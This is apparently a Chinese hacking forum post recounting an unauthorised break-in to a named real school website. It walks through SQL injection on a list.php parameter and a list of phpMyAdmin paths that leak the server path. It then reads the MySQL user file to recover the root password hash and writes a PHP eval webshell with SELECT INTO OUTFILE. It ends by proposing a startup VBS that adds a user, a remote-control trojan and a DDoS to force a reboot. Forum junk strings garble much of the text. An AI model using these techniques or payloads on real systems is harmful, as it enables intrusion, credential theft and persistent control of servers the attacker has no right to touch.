友情检测湖北省大治市第一中学

admin

第一眼看去，好像全是html静态的，都知道静态的根本不好日，多点击几个专栏
( l3 }5 E' i, B  w6 Z发现这个：http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入！
* ~" l: R, J' s% D% [! B
+ ]* \6 }7 k0 m5 s
# y. c! n! C5 `
常规手工不行，尝试突破也不行，利用穿山甲 可以注入：root权限
. L5 F0 a0 y7 _1 }" }5 _5 z
- M/ _9 |& W4 {+ q8 y那么想可以直接写入shell ，getshell有几个条件：
. }) x0 }" G  u' [5 H$ \: j, Z  A( a

1、知道站点物理路径

2、有足够大的权限

3、magic_quotes_gpc()=OFF
) S; Y9 q; r# u: L5 A
9 F8 ?( M+ M+ N9 B4 q& o7 F试着爆绝对路径：
0 J: a- C/ ^7 V* C. e1./phpMyAdmin/index.php?lang[]=1  
8 i) c" {' M  p% c- `2./phpMyAdmin/phpinfo.php  
: u) I6 y  ?& ^4 H' `4 a3./load_file()  
4 N* C7 \# C, T% |* \6 M4 B3 }& x4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
5./phpmyadmin/libraries/select_lang.lib.php  
+ ^: W# O: k8 G) L% v6./phpmyadmin/libraries/lect_lang.lib.php  
7./phpmyadmin/libraries/mcrypt.lib.php   
7 v( U9 S8 Z) h7 `2 P5 Y, ~$ j8./phpmyadmin/libraries/export/xls.php  
* ~1 h  A) z) q- D: w
均不行...........................

$ K; S, b, J! ^6 t1 ?御剑扫到这个：http://www.dyyz.net.cn//phpinfo.php       获得网站路径：D:/www/phpinfo.php

6 u' L$ {! \) l权限为root，知道网站路径，可是条件3不符合，没法写入shell ，不过服务器存在phpmyadmin
; [! h! C5 e  Z/ p
/ v7 a' T% H! e7 x/ W5 e4 P% E5 c默认不行，尝试万能密码：帐号 'localhost'@'@" 密码空 ，登录失败

敏感东西：http://202.103.49.66/Admincp.php  社工进不去...........
! }/ Z& X* E2 b! e2 s: w8 P
+ ]( f5 j( S/ H想想root还可以读，读到root密码进phpmyadmin 也可以拿shell

http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini
$ D7 x% T9 ^; f9 L- k
# \) I5 Y. p( x- T$ K( _  c2 J自己修改好读root密码的路径：D:\phpStudy\MySQL\Data\mysql\user.MYD
: O7 }, O1 D8 y9 i$ |4 [/ I; L
成功读到root密码：

) Q. D" Z: I) B' I* k' c' u17---- r(0072)
3 d7 O) L3 C- C$ b/ L+ [18---- o(006f)
( `! O6 ?4 N7 w( {' e; Q19---- o(006f)
1 J, o2 O  z) [: \# o2 }20---- t(0074)
21---- *(002a)
9 @, s+ ?/ ]1 c: S9 q% J* V22---- 8(0038)
( j& w! t% d$ W0 z" s8 L23---- 2(0032)
24---- E(0045)
25---- 1(0031)
5 R0 W/ r9 T* O/ W) y7 @6 \26---- C(0043)
) }; b) }6 J: L, k/ u7 B4 @6 C* Y$ e27---- 5(0035)
28---- 8(0038)
. u  ^$ f4 T% Q' {29---- 2(0032)
) c9 q+ S" J! k7 O9 ]30---- 8(0038)
31---- A(0041)
32---- 9(0039)
33---- B(0042)
" B% Y8 s, s) E34---- 5(0035)
, ~/ k- g3 c  @3 C1 F9 _5 E35---- 4(0034)
36---- 8(0038)
( \& I5 d$ W9 C1 v7 ]$ _+ ]: L( B37---- 6(0036)
, ~0 i6 L8 {6 Q2 o4 _38---- 4(0034)
39---- 9(0039)
4 U) u/ ]$ e5 v- c0 v/ Z7 o. W40---- 1(0031)
41---- 1(0031)
42---- 5(0035)
43---- 3(0033)
6 c/ H; N- {" K6 x  x44---- 5(0035)
45---- 9(0039)
2 s+ a' y- V5 r% H$ t46---- 8(0038)
47---- F(0046)
7 I; P8 \' _* B+ t48---- F(0046)
* a  r# |: k0 K& i49---- 4(0034)
4 @% ?, b! x) i( K50---- F(0046)
, u6 e9 a- w8 ^# u51---- 0(0030)
52---- 3(0033)
53---- 2(0032)
54---- A(0041)
. Z7 G' b8 Z/ b! s$ V( ?! V55---- 4(0034)
56---- A(0041)
: }/ s; V  q4 `+ n57---- B(0042)
* K4 t- t! S; u& O. u$ C58---- *(0044)
59---- *(0035)
5 J6 K# t& [( F% S8 O. I1 C60---- *(0041)
" X' v, c5 k* p7 I5 \1 d61---- *0032)
7 ?4 {! ~/ [2 k
$ _: H7 Y+ b: [$ |# t* L解密后成功登陆phpmyamin
                          
4 ]2 A& p- N  P
, ?4 Y8 |. b; D                             

找到mysql数据库，执行sql语句：elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
4 ^1 B2 z# d' R# G5 `. ^
成功执行，拿下shell，菜刀连接：
. W; y/ V' g3 f* M) L
服务器不支持asp,aspx,php提权无果...................

但服务器权限很松，上传个远控小马或是一个添加用户的vbs程序到启动里：

服务器上已经有个隐藏帐号了

别名     administrators
: ~" v8 y( e( o, f! h: T注释     管理员对计算机/域有不受限制的完全访问权

成员

9 g& w6 V% F% w; M6 `

-------------------------------------------------------------------------------
! ~$ k' U1 M* P8 D6 j0 v) z7 Q4 Q$ iadmin
" Z" o8 b0 l0 G. k3 s( NAdministrator
slipper$
7 A" w  U$ r6 P' Y! qsqluser
命令成功完成。

服务器权限很松，上传个vbs添加用户的到启动，不要用bat，会开机的时候显示运行批处理的。

8 r3 r( c) f3 v: M2 j; iddos服务器重启，不然就只能坐等服务器重启了...............................
4 |- U& e- o, U9 z6 P2 u
      

$ r- _( N6 D! L0 }- P

angel